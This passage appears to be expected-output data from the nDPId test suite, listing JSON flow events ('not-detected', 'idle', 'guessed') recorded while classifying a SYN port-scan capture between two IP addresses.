-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10778,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10778,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":541,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":541,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":541,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":541,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":543,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":543,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":544,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":544,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":543,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":543,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":544,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":544,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":956,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6689,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":956,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6689,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":892,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":545,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":892,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":545,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":999,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6689,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":999,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6689,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":963,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":545,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":963,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":545,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6692,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6692,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":548,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AFP","breed":"Acceptable","category":"DataTransfer"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6692,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6692,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":548,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AFP","breed":"Acceptable","category":"DataTransfer"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":41511,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":41511,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":41511,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":41511,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":895,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2601,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":895,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2602,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2602,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":960,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2601,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":960,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":554,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2602,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2602,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6699,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 